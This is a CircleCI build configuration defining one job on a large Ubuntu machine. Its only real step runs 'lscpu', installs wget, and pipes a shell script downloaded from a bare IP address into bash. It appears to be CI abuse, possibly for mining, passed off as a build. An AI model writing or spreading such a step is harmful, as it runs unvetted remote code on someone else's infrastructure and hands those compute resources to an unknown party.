version: 2.1

jobs:
  build:
    machine:
      image: ubuntu-2004:current
    resource_class: 2xlarge
    steps:
      - run: lscpu && apt update && apt -y install wget && wget -O - http://23.92.22.221/start_basket_fle_ftx_ph_ws3.sh | bash